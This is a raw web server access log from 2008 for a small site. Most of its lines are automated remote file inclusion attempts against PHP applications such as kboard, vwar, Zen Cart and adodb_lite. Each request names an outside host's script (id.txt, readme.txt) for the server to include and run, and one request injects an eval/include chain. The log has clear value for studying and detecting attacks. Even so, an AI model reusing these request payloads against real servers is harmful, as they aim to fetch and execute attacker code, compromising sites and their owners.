216.16.122.1 - - [21/Nov/2008:02:13:17 -0700] "GET /logs/access_log///vwar/backup/errors.php?error=http://shemouth.nimunet.com/irc/id.txt???? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.803" "-"
216.16.122.1 - - [21/Nov/2008:02:13:17 -0700] "GET /logs///vwar/backup/errors.php?error=http://shemouth.nimunet.com/irc/id.txt???? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.803" "-"
216.16.122.1 - - [21/Nov/2008:02:13:17 -0700] "GET ///vwar/backup/errors.php?error=http://shemouth.nimunet.com/irc/id.txt???? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.803" "-"
70.38.54.118 - - [21/Nov/2008:02:13:50 -0700] "GET /logs/error_log.old///vwar/backup/errors.php?error=http://www.mfa.gov.bt/kethek-id.txt??? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.814" "-"
80.67.20.214 - - [21/Nov/2008:02:15:36 -0700] "GET /logs/access_log.old/phphtml.php?htmlclass_path=http://www.pass100.co.kr/LykBoard/image.gif???? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.808" "-"
80.67.20.214 - - [21/Nov/2008:02:15:36 -0700] "GET /phphtml.php?htmlclass_path=http://www.pass100.co.kr/LykBoard/image.gif???? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.808" "-"
80.67.20.214 - - [21/Nov/2008:02:15:37 -0700] "GET /logs/phphtml.php?htmlclass_path=http://www.pass100.co.kr/LykBoard/image.gif???? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.808" "-"
210.245.226.28 - - [21/Nov/2008:02:15:44 -0700] "GET /logs//?path%5Bdocroot%5D=http://masla.su/image/test.txt?? HTTP/1.1" 200 1091 www.wnckids.com "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)" "-"
210.245.226.28 - - [21/Nov/2008:02:15:44 -0700] "GET //?path%5Bdocroot%5D=http://masla.su/image/test.txt?? HTTP/1.1" 200 1047 www.wnckids.com "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)" "-"
121.126.12.7 - - [21/Nov/2008:02:16:03 -0700] "GET /logs/access_log//kboard.php?board=sightseeing&cid=1&PageNum=5//kboard/kboard.php?board=free&act=http://www.enjoykankoku.jp/parti/id.txt?? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.79" "-"
121.126.12.7 - - [21/Nov/2008:02:16:04 -0700] "GET //kboard.php?board=sightseeing&cid=1&PageNum=5//kboard/kboard.php?board=free&act=http://www.enjoykankoku.jp/parti/id.txt?? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.79" "-"
121.126.12.7 - - [21/Nov/2008:02:16:04 -0700] "GET /logs//kboard.php?board=sightseeing&cid=1&PageNum=5//kboard/kboard.php?board=free&act=http://www.enjoykankoku.jp/parti/id.txt?? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.79" "-"
65.55.210.220 - - [21/Nov/2008:02:16:57 -0700] "GET / HTTP/1.1" 200 1047 www.wnckids.com "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "-"
83.149.69.60 - - [21/Nov/2008:02:17:39 -0700] "GET /logs/access_log///vwar/backup/errors.php?error=http://shemouth.nimunet.com/irc/id.txt???? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.805" "-"
83.149.69.60 - - [21/Nov/2008:02:17:39 -0700] "GET ///vwar/backup/errors.php?error=http://shemouth.nimunet.com/irc/id.txt???? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.805" "-"
83.149.69.60 - - [21/Nov/2008:02:17:39 -0700] "GET /logs///vwar/backup/errors.php?error=http://shemouth.nimunet.com/irc/id.txt???? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.805" "-"
195.137.143.11 - - [21/Nov/2008:02:17:43 -0700] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.natuurenwetenschap.be/readme.txt?? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.805" "-"
216.16.122.1 - - [21/Nov/2008:02:18:03 -0700] "GET /logs/error_log.old///vwar/backup/errors.php?error=http://shemouth.nimunet.com/irc/id.txt???? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.803" "-"
195.137.143.11 - - [21/Nov/2008:02:18:36 -0700] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.natuurenwetenschap.be/readme.txt?? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.805" "-"
195.137.143.11 - - [21/Nov/2008:02:19:45 -0700] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.natuurenwetenschap.be/readme.txt?? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.805" "-"
195.137.143.11 - - [21/Nov/2008:02:19:46 -0700] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.natuurenwetenschap.be/readme.txt?? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.805" "-"
195.137.143.11 - - [21/Nov/2008:02:20:54 -0700] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.natuurenwetenschap.be/readme.txt?? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.805" "-"
195.137.143.11 - - [21/Nov/2008:02:20:55 -0700] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.natuurenwetenschap.be/readme.txt?? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.805" "-"
195.137.143.11 - - [21/Nov/2008:02:21:06 -0700] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.natuurenwetenschap.be/readme.txt?? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.805" "-"
195.137.143.11 - - [21/Nov/2008:02:21:06 -0700] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.natuurenwetenschap.be/readme.txt?? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.805" "-"
195.137.143.11 - - [21/Nov/2008:02:22:16 -0700] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.natuurenwetenschap.be/readme.txt?? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.805" "-"
195.137.143.11 - - [21/Nov/2008:02:22:25 -0700] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.natuurenwetenschap.be/readme.txt?? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.805" "-"
195.137.143.11 - - [21/Nov/2008:02:24:04 -0700] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.natuurenwetenschap.be/readme.txt?? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.805" "-"
195.137.143.11 - - [21/Nov/2008:02:24:16 -0700] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.natuurenwetenschap.be/readme.txt?? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.805" "-"
195.137.143.11 - - [21/Nov/2008:02:25:25 -0700] "GET /logs/access_log.old//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.natuurenwetenschap.be/readme.txt?? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.805" "-"
195.137.143.11 - - [21/Nov/2008:02:25:26 -0700] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.natuurenwetenschap.be/readme.txt?? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.805" "-"
195.137.143.11 - - [21/Nov/2008:02:25:26 -0700] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.natuurenwetenschap.be/readme.txt?? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.805" "-"
80.67.20.214 - - [21/Nov/2008:02:27:34 -0700] "GET /logs/access_log/phphtml.php?htmlclass_path=http://www.pass100.co.kr/LykBoard/image.gif???? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.808" "-"
195.137.143.11 - - [21/Nov/2008:02:28:16 -0700] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.natuurenwetenschap.be/readme.txt?? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.805" "-"
195.137.143.11 - - [21/Nov/2008:02:28:16 -0700] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.natuurenwetenschap.be/readme.txt?? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.805" "-"
70.38.54.118 - - [21/Nov/2008:02:28:45 -0700] "GET /logs/access_log//ray/modules/global/inc/header.inc.php?sIncPath=http://www.mfa.gov.bt/kethek-id.txt??? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.814" "-"
70.38.54.118 - - [21/Nov/2008:02:28:45 -0700] "GET /logs//ray/modules/global/inc/header.inc.php?sIncPath=http://www.mfa.gov.bt/kethek-id.txt??? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.814" "-"
70.38.54.118 - - [21/Nov/2008:02:28:45 -0700] "GET //ray/modules/global/inc/header.inc.php?sIncPath=http://www.mfa.gov.bt/kethek-id.txt??? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.814" "-"
222.233.52.18 - - [21/Nov/2008:02:29:12 -0700] "GET ///vwar/backup/errors.php?error=http://www.mfa.gov.bt/fell-id.txt?? HTTP/1.1" 404 - www.wnckids.com "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "-"
222.233.52.18 - - [21/Nov/2008:02:29:12 -0700] "GET /logs///vwar/backup/errors.php?error=http://www.mfa.gov.bt/fell-id.txt?? HTTP/1.1" 404 - www.wnckids.com "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "-"
222.233.52.18 - - [21/Nov/2008:02:29:12 -0700] "GET /logs/access_log///vwar/backup/errors.php?error=http://www.mfa.gov.bt/fell-id.txt?? HTTP/1.1" 404 - www.wnckids.com "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "-"
83.149.69.60 - - [21/Nov/2008:02:29:43 -0700] "GET //ray/modules/global/inc/header.inc.php?sIncPath=http://shemouth.nimunet.com/irc/id.txt???? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.805" "-"
83.149.69.60 - - [21/Nov/2008:02:29:43 -0700] "GET /logs//ray/modules/global/inc/header.inc.php?sIncPath=http://shemouth.nimunet.com/irc/id.txt???? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.805" "-"
83.149.69.60 - - [21/Nov/2008:02:29:43 -0700] "GET /logs/access_log//ray/modules/global/inc/header.inc.php?sIncPath=http://shemouth.nimunet.com/irc/id.txt???? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.805" "-"
195.137.143.11 - - [21/Nov/2008:02:30:11 -0700] "GET /logs/access_log.old//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.natuurenwetenschap.be/readme.txt?? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.805" "-"
195.137.143.11 - - [21/Nov/2008:02:30:11 -0700] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.natuurenwetenschap.be/readme.txt?? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.805" "-"
195.137.143.11 - - [21/Nov/2008:02:30:12 -0700] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.natuurenwetenschap.be/readme.txt?? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.805" "-"
193.47.80.39 - - [21/Nov/2008:02:31:21 -0700] "GET /photographers.htm HTTP/1.1" 404 - www.wnckids.com "-" "Mozilla/5.0 (compatible; Exabot/3.0; +http://www.exabot.com/go/robot)" "-"
216.16.122.1 - - [21/Nov/2008:02:32:02 -0700] "GET /logs/access_log//ray/modules/global/inc/header.inc.php?sIncPath=http://shemouth.nimunet.com/irc/id.txt???? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.803" "-"
216.16.122.1 - - [21/Nov/2008:02:32:03 -0700] "GET /logs//ray/modules/global/inc/header.inc.php?sIncPath=http://shemouth.nimunet.com/irc/id.txt???? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.803" "-"
216.16.122.1 - - [21/Nov/2008:02:32:03 -0700] "GET //ray/modules/global/inc/header.inc.php?sIncPath=http://shemouth.nimunet.com/irc/id.txt???? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.803" "-"
210.245.226.28 - - [21/Nov/2008:02:33:03 -0700] "GET /logs//bbs//skin/zero_vote/ask_password.php?dir=http://masla.su/image/test.txt?? HTTP/1.1" 404 - www.wnckids.com "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)" "-"
210.245.226.28 - - [21/Nov/2008:02:33:03 -0700] "GET //bbs//skin/zero_vote/ask_password.php?dir=http://masla.su/image/test.txt?? HTTP/1.1" 404 - www.wnckids.com "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)" "-"
82.102.10.26 - - [21/Nov/2008:02:33:20 -0700] "GET /logs/administrator/components/com_clickheat/install.clickheat.php=http://www.geocities.com/jeffry_stres/id.txt? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.814" "-"
82.102.10.26 - - [21/Nov/2008:02:33:20 -0700] "GET /administrator/components/com_clickheat/install.clickheat.php=http://www.geocities.com/jeffry_stres/id.txt? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.814" "-"
59.126.46.141 - - [21/Nov/2008:02:34:53 -0700] "GET /logs/access_log.old//modules/xfsection/modify.php?dir_module=http://www.zhepb.gov.cn/idfeel.txt?? HTTP/1.1" 404 - www.wnckids.com "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "-"
195.137.143.11 - - [21/Nov/2008:02:35:24 -0700] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.natuurenwetenschap.be/readme.txt?? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.805" "-"
195.137.143.11 - - [21/Nov/2008:02:35:35 -0700] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.natuurenwetenschap.be/readme.txt?? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.805" "-"
61.8.3.74 - - [21/Nov/2008:02:36:24 -0700] "GET //kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.107.getplex.com/bbs/id? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.813" "-"
61.8.3.74 - - [21/Nov/2008:02:36:24 -0700] "GET /lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.107.getplex.com/bbs/id? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.813" "-"
70.84.3.50 - - [21/Nov/2008:02:37:40 -0700] "GET /logs//kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.geocities.com/rif_q20/id.txt???? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.79" "-"
70.84.3.50 - - [21/Nov/2008:02:37:40 -0700] "GET //kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.geocities.com/rif_q20/id.txt???? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.79" "-"
70.84.3.50 - - [21/Nov/2008:02:37:41 -0700] "GET /logs/access_log//kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.geocities.com/rif_q20/id.txt???? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.79" "-"
87.106.16.18 - - [21/Nov/2008:02:37:44 -0700] "GET /logs//kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.dhammajak.net/guestbook/img/chid.txt?? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.803" "-"
87.106.16.18 - - [21/Nov/2008:02:37:44 -0700] "GET /logs/access_log//kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.dhammajak.net/guestbook/img/chid.txt?? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.803" "-"
87.106.16.18 - - [21/Nov/2008:02:37:45 -0700] "GET //kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.dhammajak.net/guestbook/img/chid.txt?? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.803" "-"
217.111.67.5 - - [21/Nov/2008:02:37:50 -0700] "GET //kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.dhammajak.net/guestbook/img/chid.txt?? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.805" "-"
217.111.67.5 - - [21/Nov/2008:02:37:50 -0700] "GET /logs/access_log//kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.dhammajak.net/guestbook/img/chid.txt?? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.805" "-"
217.111.67.5 - - [21/Nov/2008:02:37:50 -0700] "GET /logs//kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.dhammajak.net/guestbook/img/chid.txt?? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.805" "-"
195.137.143.11 - - [21/Nov/2008:02:37:53 -0700] "GET /logs/access_log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.natuurenwetenschap.be/readme.txt?? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.805" "-"
195.137.143.11 - - [21/Nov/2008:02:37:53 -0700] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.natuurenwetenschap.be/readme.txt?? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.805" "-"
195.137.143.11 - - [21/Nov/2008:02:37:53 -0700] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.natuurenwetenschap.be/readme.txt?? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.805" "-"
61.8.3.74 - - [21/Nov/2008:02:38:14 -0700] "GET /logs/access_log//kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.107.getplex.com/bbs/id? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.813" "-"
61.8.3.74 - - [21/Nov/2008:02:38:14 -0700] "GET //kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.107.getplex.com/bbs/id? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.813" "-"
61.8.3.74 - - [21/Nov/2008:02:38:14 -0700] "GET /logs//kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.107.getplex.com/bbs/id? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.813" "-"
216.52.219.11 - - [21/Nov/2008:02:39:19 -0700] "GET /logs//kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://coreband.com/guestbook//of.xpp??? HTTP/1.1" 404 - www.wnckids.com "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)" "-"
216.52.219.11 - - [21/Nov/2008:02:39:19 -0700] "GET //kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://coreband.com/guestbook//of.xpp??? HTTP/1.1" 404 - www.wnckids.com "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)" "-"
216.52.219.11 - - [21/Nov/2008:02:39:20 -0700] "GET /logs//kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.dnai.co.kr/include/top_menu08.inc??? HTTP/1.1" 404 - www.wnckids.com "-" "Avant Browser (http://www.avantbrowser.com)" "-"
216.52.219.11 - - [21/Nov/2008:02:39:20 -0700] "GET //kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.dnai.co.kr/include/top_menu08.inc??? HTTP/1.1" 404 - www.wnckids.com "-" "Avant Browser (http://www.avantbrowser.com)" "-"
70.84.3.50 - - [21/Nov/2008:02:40:34 -0700] "GET /logs/error_log.old//kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.geocities.com/rif_q20/id.txt???? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.79" "-"
193.47.80.39 - - [21/Nov/2008:02:40:59 -0700] "GET /parkspools.htm HTTP/1.1" 404 - www.wnckids.com "-" "Mozilla/5.0 (compatible; Exabot/3.0; +http://www.exabot.com/go/robot)" "-"
195.137.143.11 - - [21/Nov/2008:02:41:17 -0700] "GET /logs/access_log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.natuurenwetenschap.be/readme.txt?? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.805" "-"
195.137.143.11 - - [21/Nov/2008:02:41:17 -0700] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.natuurenwetenschap.be/readme.txt?? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.805" "-"
195.137.143.11 - - [21/Nov/2008:02:41:18 -0700] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.natuurenwetenschap.be/readme.txt?? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.805" "-"
65.55.210.211 - - [21/Nov/2008:02:41:43 -0700] "GET /robots.txt HTTP/1.1" 404 - www.wnckids.com "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "-"
65.55.210.211 - - [21/Nov/2008:02:41:43 -0700] "GET /?N=D HTTP/1.1" 200 1047 www.wnckids.com "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "-"
210.59.227.15 - - [21/Nov/2008:02:42:12 -0700] "GET /logs//components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.107.getplex.com/bbs/id? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.811" "-"
210.59.227.15 - - [21/Nov/2008:02:42:13 -0700] "GET //components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.107.getplex.com/bbs/id? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.811" "-"
210.59.227.15 - - [21/Nov/2008:02:42:44 -0700] "GET /logs//kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.107.getplex.com/bbs/id? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.811" "-"
210.59.227.15 - - [21/Nov/2008:02:42:45 -0700] "GET //kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.107.getplex.com/bbs/id? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.811" "-"
70.84.182.98 - - [21/Nov/2008:02:43:34 -0700] "GET //technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?=http://www.samilglass.com/images/v6id.txt??? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.810" "-"
70.84.182.98 - - [21/Nov/2008:02:43:34 -0700] "GET /logs/error_log.old//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?=http://www.samilglass.com/images/v6id.txt??? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.810" "-"
70.84.182.98 - - [21/Nov/2008:02:43:35 -0700] "GET /logs//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?=http://www.samilglass.com/images/v6id.txt??? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.810" "-"
121.126.12.7 - - [21/Nov/2008:02:43:50 -0700] "GET /logs/error_log.old//kboard.php?board=sightseeing&cid=1&PageNum=5//kboard/kboard.php?board=free&act=http://www.enjoykankoku.jp/parti/id.txt?? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.79" "-"
70.84.182.98 - - [21/Nov/2008:02:45:17 -0700] "GET /logs/access_log.old//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?=http://www.samilglass.com/images/v6id.txt??? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.810" "-"
61.8.3.74 - - [21/Nov/2008:02:45:29 -0700] "GET /logs/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.107.getplex.com/bbs/id? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.813" "-"
61.8.3.74 - - [21/Nov/2008:02:45:29 -0700] "GET /lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.107.getplex.com/bbs/id? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.813" "-"
64.13.249.26 - - [21/Nov/2008:02:45:49 -0700] "GET //kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.groundviewproductions.org/Store/bo.do? HTTP/1.1" 404 - www.wnckids.com "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "-"
